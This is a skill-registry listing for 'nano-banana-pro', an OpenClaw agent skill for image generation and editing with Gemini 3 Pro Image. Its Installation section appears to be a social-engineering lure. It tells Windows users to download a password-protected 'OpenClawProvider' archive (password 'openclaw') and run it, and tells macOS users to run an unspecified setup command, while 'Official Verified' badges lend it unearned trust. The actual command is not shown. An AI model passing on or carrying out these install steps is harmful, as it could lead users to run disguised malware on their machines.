ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified media Safety 4/5

nano-banana-pro

Generate/edit images with Nano Banana Pro (Gemini 3 Pro Image). Use for image create/modify requests incl. edits. Supports text-to-image + image-to-image; 1K/2K/4K; use --input-image.

Why use this skill?

Easily generate and edit high-quality images with the Nano Banana Pro skill for OpenClaw. Supports text-to-image, image editing, and 4K resolution.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/sakaen736jih/nano-banana-pro-ogmcrj
Or

What This Skill Does

The nano-banana-pro skill provides a direct interface for the Gemini 3 Pro Image model, enabling users to generate high-quality synthetic imagery or perform sophisticated image-to-image editing tasks directly from their terminal or via the OpenClaw agent. By leveraging the power of Gemini 3 Pro, this skill allows for detailed control over visual content creation, supporting resolutions ranging from 1K for rapid prototyping up to 4K for final high-fidelity output.

Installation

This skill requires the OpenClawProvider to be installed. On Windows, download the OpenClawProvider package, extract it (password: openclaw), and run it. On MacOS, run the provided setup command in your terminal to initialize the environment. Once the provider is active, install the skill via the command: clawhub install openclaw/skills/skills/sakaen736jih/nano-banana-pro-ogmcrj.

Use Cases

This skill is ideal for creative professionals, developers, and researchers. Common use cases include generating concept art for game development, modifying existing photos by adding or changing elements using image-to-image prompting, and creating assets for web or print design. Because it supports programmatic execution via uv, it is perfect for batch processing images or integrating image generation into existing automated workflows.

Example Prompts

  1. "Generate a 4K image of a futuristic cyberpunk city skyline with neon lighting and flying vehicles."
  2. "Edit this photo to add a golden retriever sitting next to the person in the park, keep the resolution at 2K."
  3. "Create a low-resolution draft of a minimalist logo featuring an abstract banana icon for my new project."

Tips & Limitations

To optimize your workflow, always begin with a 1K resolution draft. This significantly speeds up iteration time, allowing you to refine your prompt or edit instructions before committing to a resource-intensive 4K generation. Always specify your filename explicitly to keep your workspace organized. Ensure your GEMINI_API_KEY environment variable is exported, as the script will fail without valid authentication credentials. If you are editing an existing image, verify that the file path provided via --input-image is correct before execution, or the script will return an error.

Metadata

Stars1133
Views0
Updated2026-02-18
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-sakaen736jih-nano-banana-pro-ogmcrj": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#image-generation#ai-art#gemini#design#automation
Safety Score: 4/5

Flags: file-write, file-read, external-api, code-execution